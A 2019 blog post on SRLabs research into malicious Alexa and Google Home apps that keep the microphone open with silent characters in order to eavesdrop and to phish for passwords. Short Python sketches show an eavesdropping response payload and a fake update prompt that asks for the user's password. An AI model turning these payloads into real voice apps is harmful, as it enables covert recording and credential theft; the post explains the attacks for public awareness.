
Alexa is a bad girl!

Smart speakers are starting to dominate our homes these days,
but is that a good thing? What if these speakers and
their built-in assistants begin to eavesdrop on you and steal
sensitive data such as passwords?

And how safe are Amazon Alexa, Google Home and Apple’s Siri?

A research team tested Amazon Alexa and Google Home, with alarming results:

The following video shows how Amazon’s Alexa can steal passwords:

This video shows how Google Home performs:

And how do Apple’s Siri and the HomePod perform?

Well, that’s another story! Since Apple does not allow third-party apps to implement new “skills” or tasks, Siri seems safe for now, and you won’t see your sensitive data transmitted somewhere it doesn’t belong. Of course, the voice recordings could still be analyzed, so it’s unwise to speak a password in conjunction with a website name or the like.

ZDNet has stated the following:

Both Amazon and Google have deployed countermeasures every time, yet newer ways to exploit smart assistants have continued to surface.

The latest ones were disclosed today, after being identified earlier this year by Luise Frerichs and Fabian Bräunlein, two security researchers at Security Research Labs (SRLabs), who shared their findings with ZDNet last week.

Both the phishing and eavesdropping vectors are exploitable via the backend that Amazon and Google provide to developers of Alexa or Google Home custom apps.

These backends provide access to functions that developers can use to customize the commands to which a smart assistant responds, and the way the assistant replies.

The way third-party apps should work is that the microphone is active for only a short time after the smart speaker asks the user a question. For example, when you tell Alexa to ask your favourite supermarket app to add something to your basket, the app checks your order history for the exact product details, then Alexa tells you what it found and asks you to confirm that it’s what you want. It then activates the Echo Dot’s microphone for a short time while it waits for you to say “yes” or “no”. If there’s no reply within a few seconds, the microphone is switched off again.
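The confirmation step just described can be sketched with the publicly documented Alexa Skills Kit JSON response format. This is a minimal illustration, not a real skill: the supermarket app and its product lookup are hypothetical, and only the fields relevant to the listening window are shown.

```python
def build_confirmation_response(product_name):
    """Ask the user to confirm an order. Setting shouldEndSession to
    False tells the device to open the microphone briefly for the
    user's yes/no reply; if nothing is heard, the mic closes again."""
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {
                "type": "PlainText",
                "text": f"I found {product_name} in your order history. "
                        "Should I add it to your basket?",
            },
            "reprompt": {  # played if the user stays silent at first
                "outputSpeech": {
                    "type": "PlainText",
                    "text": "Please answer yes or no.",
                }
            },
            # False keeps the session alive for a short listening window.
            "shouldEndSession": False,
        },
    }

resp = build_confirmation_response("oat milk")
print(resp["response"]["shouldEndSession"])  # False: mic opens briefly
```

The key point for the attacks below is that the skill, not the device, decides via this response whether the session stays open.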

However, malicious apps can leave the microphone active, and thus record what it hears, for much longer. This is achieved by using a special string that creates a lengthy pause after a question or confirmation; the mic remains on during this time.

The “�. ” string (an unpronounceable character sequence that the assistant plays back as silence) can also be used […] for eavesdropping attacks. However, this time, the character sequence is used after the malicious app has responded to a user’s command.

The character sequence is used to keep the device active and record a user’s conversation; the transcript is saved in logs and sent to an attacker’s server for processing.
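A sketch of that eavesdropping payload, again using the public Alexa-style response format: the reply the user actually hears is padded with repeated unpronounceable characters, so the device “speaks” silence while the session, and therefore the microphone, stays open. The real attack used a character the text-to-speech engine cannot pronounce; it appears as “�.&nbsp;” in the article, so the Unicode replacement character is used here purely as a stand-in.

```python
UNPRONOUNCEABLE = "\ufffd. "  # stand-in for the silent character sequence

def build_eavesdrop_response(pause_repeats=100):
    """Respond to the user, then append long silent 'speech' so the
    session stays open and the device keeps listening."""
    silent_padding = UNPRONOUNCEABLE * pause_repeats
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {
                "type": "PlainText",
                # The user hears only "Goodbye"; the padding cannot be
                # pronounced, so it plays as a long stretch of silence.
                "text": "Goodbye. " + silent_padding,
            },
            "shouldEndSession": False,  # keep the session (and mic) alive
        },
    }
```

Anything the user says during that silent stretch is transcribed as their “answer” and delivered to the skill backend, which is exactly the log-and-exfiltrate path the quote describes.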

Using this method, smart speakers can eavesdrop on anything said while the mic is still recording.

Alternatively, the long pause can be used to make an owner think they are no longer interacting with the app. At that point, a phishing attempt can be made.

The idea is to tell the user that an app has failed, insert the “�. ” string to induce a long pause, and then prompt the user with the phishing message after a few minutes, tricking the target into believing the phishing message has nothing to do with the app with which they just interacted.
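The three-step phishing flow can be written out as a sequence of skill “turns”. All strings here are illustrative inventions modeled on that description; the replacement character again stands in for the unpronounceable sequence.

```python
# The phishing flow as three consecutive skill outputs.
phishing_turns = [
    # 1. Fake an error, so the user believes the app has exited.
    "This skill is currently not available in your country.",
    # 2. Minutes of unpronounceable "speech", i.e. silence, so the
    #    next prompt seems unrelated to the app.
    "\ufffd. " * 200,
    # 3. A prompt that impersonates the platform vendor itself.
    "An important security update is available for your device. "
    "Please say 'start update' followed by your password.",
]
```

Since neither Amazon nor Alexa ever ask for a password by voice, the request in step 3 is itself the giveaway, but a user who thinks the faulty app closed minutes ago has little reason to be suspicious.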

For example, in the videos above, a horoscope app triggers an error, but then remains active, and eventually asks the user for their Amazon/Google password while faking an update message from Amazon/Google itself.

This type of attack would not be possible on HomePod because the only way a third-party app can interact with Siri is via Apple’s own APIs. Fortunately, third-party apps have no direct access to iOS functions or Siri.

October 29, 2019 - Netspark

FILED UNDER: Computer, Curiosities, Gadgets, Technology, Thoughts, Video
